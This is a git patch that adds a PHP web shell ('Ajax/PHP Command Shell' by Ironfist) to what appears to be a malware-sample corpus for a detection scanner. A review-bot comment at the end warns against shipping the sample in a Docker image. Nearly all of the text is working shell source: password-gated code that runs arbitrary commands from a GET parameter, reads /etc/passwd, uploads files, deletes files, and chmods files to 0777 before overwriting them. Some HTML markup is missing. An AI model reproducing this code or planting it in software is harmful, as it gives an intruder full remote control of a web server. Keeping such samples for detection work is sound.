From 48936efa96ae17295be4e0a71be3294f0ec6aef8 Mon Sep 17 00:00:00 2001 From: Mathieu Deous Date: Mon, 2 May 2022 20:18:23 +0200 Subject: Make application go-install-able and create a docker image --- data/samples/classic/ajaxshell.php | 652 +++++++++++++++++++++++++++++++++++++ 1 file changed, 652 insertions(+) create mode 100644 data/samples/classic/ajaxshell.php (limited to 'data/samples/classic/ajaxshell.php') diff --git a/data/samples/classic/ajaxshell.php b/data/samples/classic/ajaxshell.php new file mode 100644 index 0000000..0445858 --- /dev/null +++ b/data/samples/classic/ajaxshell.php @@ -0,0 +1,652 @@ + 'ClearScreen()', +'Clear History' => 'ClearHistory()', +'Can I function?' => "runcommand('canirun','GET')", +'Get server info' => "runcommand('showinfo','GET')", +'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", +'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", +'Running processes' => "runcommand('ps -aux','GET')", +'Readme' => "runcommand('shellhelp','GET')" + +); +$thisfile = basename(__FILE__); + +$style = ''; +$sess = __FILE__.$password; +if(isset($_POST['p4ssw0rD'])) +{ + if($_POST['p4ssw0rD'] == $password) + { + $_SESSION[$sess] = $_POST['p4ssw0rD']; + } + else + { + die("Wrong password"); + } + +} +if($_SESSION[$sess] == $password) +{ + if(isset($_SESSION['workdir'])) + { + if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) + { + chdir($_SESSION['workdir']); + } + } + + if(isset($_FILES['uploadedfile']['name'])) + { + $target_path = "./"; + $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { + + } + } + + if(isset($_GET['runcmd'])) + { + + $cmd = $_GET['runcmd']; + + print "".get_current_user()."~# ". htmlspecialchars($cmd)."
"; + + if($cmd == "") + { + print "Empty Command..type \"shellhelp\" for some ehh...help"; + } + + elseif($cmd == "upload") + { + print '
Uploading to: '.realpath("."); + if(is_writable(realpath("."))) + { + print "
I can write to this directory"; + } + else + { + print "
I can't write to this directory, please choose another one."; + } + + } + elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) + { + if(file_exists($file[1]) && is_dir($file[1])) + { + chdir($file[1]); + $_SESSION['workdir'] = $file[1]; + print "Current directory changed to ".$file[1]; + } + else + { + print "Directory not found"; + } + } + + elseif(strtolower($cmd) == "shellhelp") + { +print 'Ajax/PHP Command Shell +© By Ironfist + +The shell can be used by anyone to command any server, the main purpose was +to create a shell that feels as dynamic as possible, is expandable and easy +to understand. + +If one of the command execution functions work, the shell will function fine. +Try the "canirun" command to check this. + +Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re +not used to these commands, google a little. + +Custom Functions +If you want to add your own custom command in the Quick Commands list, check +out the code. The $function array contains \'func name\' => \'javascript function\'. +Take a look at the built-in functions for examples. + +I know this readme isn\'t providing too much information, but hell, does this shell +even require one :P + +- Iron + '; + + } + elseif(ereg("editfile (.*)",$cmd,$file)) + { + if(file_exists($file[1]) && !is_dir($file[1])) + { + print "

"; + } + else + { + print "File not found."; + } + } + elseif(ereg("deletefile (.*)",$cmd,$file)) + { + if(is_dir($file[1])) + { + if(rmdir($file[1])) + { + print "Directory succesfully deleted."; + } + else + { + print "Couldn't delete directory!"; + } + } + else + { + if(unlink($file[1])) + { + print "File succesfully deleted."; + } + else + { + print "Couldn't delete file!"; + } + } + } + elseif(strtolower($cmd) == "canirun") + { + print "If any of these functions is Enabled, the shell will function like it should.
"; + if(function_exists(passthru)) + { + print "Passthru: Enabled
"; + } + else + { + print "Passthru: Disabled
"; + } + + if(function_exists(exec)) + { + print "Exec: Enabled
"; + } + else + { + print "Exec: Disabled
"; + } + + if(function_exists(system)) + { + print "System: Enabled
"; + } + else + { + print "System: Disabled
"; + } + if(function_exists(shell_exec)) + { + print "Shell_exec: Enabled
"; + } + else + { + print "Shell_exec: Disabled
"; + } + print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a
reason why the commands aren't executed, this is probally it.
"; + if( ini_get('safe_mode') ){ + print "Safe Mode: Enabled"; + } + else + { + print "Safe Mode: Disabled"; + } + print "

Open_basedir will block access to some files you shouldn't access.
"; + if( ini_get('open_basedir') ){ + print "Open_basedir: Enabled"; + } + else + { + print "Open_basedir: Disabled"; + } + } + //About the shell + elseif(ereg("listdir (.*)",$cmd,$directory)) + { + + if(!file_exists($directory[1])) + { + die("Directory not found"); + } + //Some variables + chdir($directory[1]); + $i = 0; $f = 0; + $dirs = ""; + $filez = ""; + + if(!ereg("/$",$directory[1])) //Does it end with a slash? + { + $directory[1] .= "/"; //If not, add one + } + print "Listing directory: ".$directory[1]."
"; + print ""; + + if ($handle = opendir($directory[1])) { + while (false !== ($file = readdir($handle))) { + if(is_dir($file)) + { + $dirs[$i] = $file; + $i++; + } + else + { + $filez[$f] = $file; + $f++; + } + + } + print "
DirectoriesFiles
"; + + foreach($dirs as $directory) + { + print "[D][W]".$directory."
"; + } + + print "
"; + + foreach($filez as $file) + { + print "[D]".$file."
"; + } + + print "
"; + } + } + elseif(strtolower($cmd) == "about") + { + print "Ajax Command Shell by Ironfist.
Version $version"; + } + //Show info + elseif(strtolower($cmd) == "showinfo") + { + if(function_exists(disk_free_space)) + { + $free = disk_free_space("/") / 1000000; + } + else + { + $free = "N/A"; + } + if(function_exists(disk_total_space)) + { + $total = trim(disk_total_space("/") / 1000000); + } + else + { + $total = "N/A"; + } + $path = realpath ("."); + + print "Free: $free / $total MB
Current path: $path
Uname -a Output:
"; + + if(function_exists(passthru)) + { + passthru("uname -a"); + } + else + { + print "Passthru is disabled :("; + } + } + //Read /etc/passwd + elseif(strtolower($cmd) == "etcpasswdfile") + { + + $pw = file('/etc/passwd/'); + foreach($pw as $line) + { + print $line; + } + + + } + //Execute any other command + else + { + + if(function_exists(passthru)) + { + passthru($cmd); + } + else + { + if(function_exists(exec)) + { + exec("ls -la",$result); + foreach($result as $output) + { + print $output."
"; + } + } + else + { + if(function_exists(system)) + { + system($cmd); + } + else + { + if(function_exists(shell_exec)) + { + print shell_exec($cmd); + } + else + { + print "Sorry, none of the command functions works."; + } + } + } + } + } + } + + elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) + { + $file = $_POST['filetosave']; + if(!is_writable($file)) + { + if(!chmod($file, 0777)) + { + die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ + } + } + + $fh = fopen($file, 'w'); + $dt = $_POST['filecontent']; + fwrite($fh, $dt); + fclose($fh); + } + else + { +?> + + +Command Shell ~ <?php print getenv("HTTP_HOST"); ?> + + + + + + + + + + +
+ +

+
Quick Commands
+ +
+ $execute) +{ +print ' 
'; +} +?> + +
+ + +
+
Command history
+
+
+
About
+
+
+Ajax/PHP Command Shell
by Ironfist +
+Version + +
+
+ +
Thanks to everyone @ +SharePlaza +
+milw0rm +
+and special greetings to everyone in rootshell +
+ +
+ + + + +
+[Execute command] +[Upload file] +[Change directory] +[Filebrowser] +[Create File] + +
+ +
+
+   
+Command:
+
+
+
+
+ + + +
+
You are not logged in, please login.
Password: +
"; +} +?> \ No newline at end of file -- cgit v1.3
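Review bot: This sample is a working PHP web shell added with a live `.php` extension and mode 100644, and nothing visible in the file marks it as inert test data. The password check near the top (`$_POST['p4ssw0rD'] == $password`) gates branches that hand `$_GET['runcmd']` to `passthru`/`system`/`shell_exec` and write to the path in `$_POST['filetosave']`. Because the commit subject says it also creates a Docker image, confirm that `data/samples/` never ends up under a PHP-enabled document root, and leave the corpus out of the image if the scanner does not need it at runtime. I would also add a short README in `data/samples/` saying the files are malware samples kept for detection tests and must not be deployed or executed. This page is limited to the one file, so what the image actually contains is an assumption to check against the rest of the commit.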